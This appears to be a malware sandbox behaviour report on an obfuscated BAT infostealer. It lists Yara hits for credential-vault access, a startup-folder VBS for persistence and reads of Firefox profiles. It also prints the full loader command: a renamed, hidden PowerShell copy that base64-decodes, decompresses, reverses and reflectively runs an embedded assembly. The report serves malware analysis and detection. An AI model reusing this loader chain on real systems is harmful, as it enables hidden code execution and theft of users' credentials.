Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\PowerShell	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\PowerShell	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\PowerShell	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\PowerShell	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System	Jump to behavior

System Summary

Malicious sample detected (through community Yara rule)

Source: 19.2.ChannelUris.bat.Zhe.6ea90f0.3.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 7.2.87M9Y3P4Z7.bat.Zhe.68232e8.7.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 19.2.ChannelUris.bat.Zhe.6ea90f0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 8.2.InstallUtil.exe.380000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 7.2.87M9Y3P4Z7.bat.Zhe.68232e8.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: Process Memory Space: 87M9Y3P4Z7.bat.Zhe PID: 5128, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: ChannelUris.bat.Zhe PID: 4892, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

Found large BAT file

Source: 87M9Y3P4Z7.bat

Static file information: 1410688

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Jump to behavior

Abnormal high CPU Usage

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Process Stats: CPU usage > 49%

Detected potential crypto function

Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Code function: 7_2_028BF4E0	7_2_028BF4E0
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Code function: 7_2_028BB766	7_2_028BB766
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Code function: 7_2_088C85D6	7_2_088C85D6
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Code function: 7_2_088CC6D0	7_2_088CC6D0
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Code function: 7_2_088CD8D8	7_2_088CD8D8
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Code function: 7_2_088C0011	7_2_088C0011
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Code function: 7_2_088CC9F7	7_2_088CC9F7
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Code function: 7_2_088C952A	7_2_088C952A
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Code function: 7_2_088C9538	7_2_088C9538
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Code function: 7_2_088C3E0F	7_2_088C3E0F
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Code function: 7_2_089B0011	7_2_089B0011
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Code function: 7_2_089B0040	7_2_089B0040
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Code function: 7_2_089B3188	7_2_089B3188
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Code function: 7_2_089B3141	7_2_089B3141
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Code function: 7_2_089B2A89	7_2_089B2A89
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Code function: 7_2_08C4EF98	7_2_08C4EF98
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Code function: 7_2_08C30040	7_2_08C30040
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Code function: 7_2_08C3001B	7_2_08C3001B
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Code function: 7_2_08C4E258	7_2_08C4E258
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 8_2_00C441F0	8_2_00C441F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 8_2_00C44AC0	8_2_00C44AC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 8_2_00C43EA8	8_2_00C43EA8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 8_2_05EBB4A8	8_2_05EBB4A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 8_2_05EB6780	8_2_05EB6780
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 8_2_05EB0040	8_2_05EB0040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 8_2_05EB3390	8_2_05EB3390
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 8_2_05EBE959	8_2_05EBE959
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 8_2_05EB88A8	8_2_05EB88A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 8_2_05EBADC8	8_2_05EBADC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 8_2_05EB8FFB	8_2_05EB8FFB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 8_2_05EB5988	8_2_05EB5988
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 8_2_066C33D0	8_2_066C33D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 8_2_05EB0025	8_2_05EB0025
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 8_2_05EB0006	8_2_05EB0006
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Code function: 19_2_04B1F4E0	19_2_04B1F4E0
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Code function: 19_2_04B1B766	19_2_04B1B766
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Code function: 19_2_092BC6D0	19_2_092BC6D0
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Code function: 19_2_092BC9F7	19_2_092BC9F7
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Code function: 19_2_092B0006	19_2_092B0006
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Code function: 19_2_092BD8D8	19_2_092BD8D8
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Code function: 19_2_092B3E0F	19_2_092B3E0F
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Code function: 19_2_093A3141	19_2_093A3141
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Code function: 19_2_093A3188	19_2_093A3188
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Code function: 19_2_093A001E	19_2_093A001E
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Code function: 19_2_093A0040	19_2_093A0040
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Code function: 19_2_093A2A89	19_2_093A2A89
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Code function: 19_2_0983EF98	19_2_0983EF98
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Code function: 19_2_09820015	19_2_09820015
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Code function: 19_2_09820040	19_2_09820040
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Code function: 19_2_0983E258	19_2_0983E258
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 20_2_00AE4AC0	20_2_00AE4AC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 20_2_00AE3EA8	20_2_00AE3EA8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 20_2_00AE41F0	20_2_00AE41F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 20_2_00AEF6D8	20_2_00AEF6D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 20_2_06086780	20_2_06086780
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 20_2_0608B4A8	20_2_0608B4A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 20_2_06083390	20_2_06083390
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 20_2_06080040	20_2_06080040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 20_2_060888A8	20_2_060888A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 20_2_0608E959	20_2_0608E959
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 20_2_06088FFB	20_2_06088FFB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 20_2_0608ADC8	20_2_0608ADC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 20_2_06085988	20_2_06085988
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 20_2_067633D0	20_2_067633D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 20_2_06080007	20_2_06080007

Sample file is different than original file name gathered from version info

Source: 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2262268003.000000000293B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs 87M9Y3P4Z7.bat
Source: 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2269230872.0000000006797000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs 87M9Y3P4Z7.bat
Source: 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2262903919.0000000005095000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename46da3e76-ea11-4ef3-9ed6-348209ad609f.exe4 vs 87M9Y3P4Z7.bat
Source: 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2262903919.00000000048A1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename vs 87M9Y3P4Z7.bat
Source: 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2289612255.00000000088F0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs 87M9Y3P4Z7.bat
Source: 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2269230872.0000000006687000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs 87M9Y3P4Z7.bat
Source: 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2262903919.0000000004903000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFileName vs 87M9Y3P4Z7.bat
Source: 87M9Y3P4Z7.bat.Zhe, 00000007.00000000.2230653577.0000000000454000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamePowerShell.EXEj% vs 87M9Y3P4Z7.bat
Source: 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2269230872.0000000006052000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameFittings-Pipping.exeB vs 87M9Y3P4Z7.bat
Source: 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2269230872.0000000006052000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTdhvrq.dll" vs 87M9Y3P4Z7.bat
Source: 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2269230872.0000000006052000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs 87M9Y3P4Z7.bat
Source: 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2269230872.00000000066F5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs 87M9Y3P4Z7.bat
Source: 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2262903919.0000000004FC9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs 87M9Y3P4Z7.bat
Source: 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2269230872.000000000680D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename46da3e76-ea11-4ef3-9ed6-348209ad609f.exe4 vs 87M9Y3P4Z7.bat
Source: 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2289959595.0000000008940000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs 87M9Y3P4Z7.bat
Source: 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2287026414.0000000007FA0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameTdhvrq.dll" vs 87M9Y3P4Z7.bat
Source: 87M9Y3P4Z7.bat.Zhe.5.dr	Binary or memory string: OriginalFilenamePowerShell.EXEj% vs 87M9Y3P4Z7.bat

Yara signature match

Source: 19.2.ChannelUris.bat.Zhe.6ea90f0.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 7.2.87M9Y3P4Z7.bat.Zhe.68232e8.7.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 19.2.ChannelUris.bat.Zhe.6ea90f0.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 8.2.InstallUtil.exe.380000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 7.2.87M9Y3P4Z7.bat.Zhe.68232e8.7.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: Process Memory Space: 87M9Y3P4Z7.bat.Zhe PID: 5128, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: ChannelUris.bat.Zhe PID: 4892, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Source: 7.2.87M9Y3P4Z7.bat.Zhe.6256430.2.raw.unpack, FOOWUJHFfF8folaxFXM.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 7.2.87M9Y3P4Z7.bat.Zhe.6256430.2.raw.unpack, FOOWUJHFfF8folaxFXM.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 7.2.87M9Y3P4Z7.bat.Zhe.6256430.2.raw.unpack, FOOWUJHFfF8folaxFXM.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 7.2.87M9Y3P4Z7.bat.Zhe.6256430.2.raw.unpack, FOOWUJHFfF8folaxFXM.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 7.2.87M9Y3P4Z7.bat.Zhe.6348058.5.raw.unpack, FOOWUJHFfF8folaxFXM.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 7.2.87M9Y3P4Z7.bat.Zhe.6348058.5.raw.unpack, FOOWUJHFfF8folaxFXM.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 7.2.87M9Y3P4Z7.bat.Zhe.6348058.5.raw.unpack, FOOWUJHFfF8folaxFXM.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 7.2.87M9Y3P4Z7.bat.Zhe.6348058.5.raw.unpack, FOOWUJHFfF8folaxFXM.cs	Cryptographic APIs: 'CreateDecryptor'

Source: 7.2.87M9Y3P4Z7.bat.Zhe.6797780.6.raw.unpack, ITaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
Source: 7.2.87M9Y3P4Z7.bat.Zhe.6797780.6.raw.unpack, TaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
Source: 7.2.87M9Y3P4Z7.bat.Zhe.6797780.6.raw.unpack, Task.cs	Task registration methods: 'RegisterChanges', 'CreateTask'
Source: 7.2.87M9Y3P4Z7.bat.Zhe.6797780.6.raw.unpack, TaskService.cs	Task registration methods: 'CreateFromToken'
Source: 7.2.87M9Y3P4Z7.bat.Zhe.8940000.14.raw.unpack, ITaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
Source: 7.2.87M9Y3P4Z7.bat.Zhe.8940000.14.raw.unpack, TaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'

Source: 7.2.87M9Y3P4Z7.bat.Zhe.8940000.14.raw.unpack, Task.cs	Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 7.2.87M9Y3P4Z7.bat.Zhe.8940000.14.raw.unpack, TaskSecurity.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 7.2.87M9Y3P4Z7.bat.Zhe.8940000.14.raw.unpack, TaskSecurity.cs	Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: 7.2.87M9Y3P4Z7.bat.Zhe.6797780.6.raw.unpack, User.cs	Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
Source: 7.2.87M9Y3P4Z7.bat.Zhe.6797780.6.raw.unpack, TaskSecurity.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 7.2.87M9Y3P4Z7.bat.Zhe.6797780.6.raw.unpack, TaskSecurity.cs	Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: 7.2.87M9Y3P4Z7.bat.Zhe.6797780.6.raw.unpack, TaskFolder.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 7.2.87M9Y3P4Z7.bat.Zhe.8940000.14.raw.unpack, TaskPrincipal.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 7.2.87M9Y3P4Z7.bat.Zhe.6797780.6.raw.unpack, TaskPrincipal.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 7.2.87M9Y3P4Z7.bat.Zhe.6797780.6.raw.unpack, Task.cs	Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 7.2.87M9Y3P4Z7.bat.Zhe.8940000.14.raw.unpack, TaskFolder.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 7.2.87M9Y3P4Z7.bat.Zhe.8940000.14.raw.unpack, User.cs	Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winBAT@31/9@4/2

Source: C:\Windows\System32\xcopy.exe

File created: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6568:120:WilError_03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3184:120:WilError_03

Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1ktqy3wn.ooi.ps1

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\87M9Y3P4Z7.bat" "

Source: unknown

Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ChannelUris.vbs"

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Jump to behavior

Source: C:\Windows\System32\chcp.com

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe

File read: C:\Users\user\Desktop\87M9Y3P4Z7.bat

Jump to behavior

Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\87M9Y3P4Z7.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo F "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\xcopy.exe xcopy /d /q /y /h /i C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +s +h C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe -WindowStyle hidden -command "$Onnkl = get-content 'C:\Users\user\Desktop\87M9Y3P4Z7.bat' \| Select-Object -Last 1; $Mdqytced = [System.Convert]::FromBase64String($Onnkl);$Ktdhxz = New-Object System.IO.MemoryStream( , $Mdqytced );$Mcldrihy = New-Object System.IO.MemoryStream;$Plcywucshy = New-Object System.IO.Compression.GzipStream $Ktdhxz, ([IO.Compression.CompressionMode]::Decompress);$Plcywucshy.CopyTo( $Mcldrihy );$Plcywucshy.Close();$Ktdhxz.Close();[byte[]] $Mdqytced = $Mcldrihy.ToArray();[Array]::Reverse($Mdqytced); $Mxpzv = [System.AppDomain]::CurrentDomain.Load($Mdqytced); $Ylvhvbxsq = $Mxpzv.EntryPoint; $Ylvhvbxsq.DeclaringType.InvokeMember($Ylvhvbxsq.Name, [System.Reflection.BindingFlags]::InvokeMethod, $null, $null, $null)\| Out-Null"
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: unknown	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ChannelUris.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\ChannelUris.bat" "
Source: C:\Windows\System32\xcopy.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\xcopy.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\xcopy.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo F "
Source: C:\Windows\System32\xcopy.exe	Process created: C:\Windows\System32\xcopy.exe xcopy /d /q /y /h /i C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe
Source: C:\Windows\System32\xcopy.exe	Process created: C:\Windows\System32\attrib.exe attrib +s +h C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe
Source: C:\Windows\System32\xcopy.exe	Process created: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe -WindowStyle hidden -command "$Onnkl = get-content 'C:\Users\user\AppData\Roaming\ChannelUris.bat' \| Select-Object -Last 1; $Mdqytced = [System.Convert]::FromBase64String($Onnkl);$Ktdhxz = New-Object System.IO.MemoryStream( , $Mdqytced );$Mcldrihy = New-Object System.IO.MemoryStream;$Plcywucshy = New-Object System.IO.Compression.GzipStream $Ktdhxz, ([IO.Compression.CompressionMode]::Decompress);$Plcywucshy.CopyTo( $Mcldrihy );$Plcywucshy.Close();$Ktdhxz.Close();[byte[]] $Mdqytced = $Mcldrihy.ToArray();[Array]::Reverse($Mdqytced); $Mxpzv = [System.AppDomain]::CurrentDomain.Load($Mdqytced); $Ylvhvbxsq = $Mxpzv.EntryPoint; $Ylvhvbxsq.DeclaringType.InvokeMember($Ylvhvbxsq.Name, [System.Reflection.BindingFlags]::InvokeMethod, $null, $null, $null)\| Out-Null"
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo F "	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\xcopy.exe xcopy /d /q /y /h /i C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +s +h C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Jump to behavior
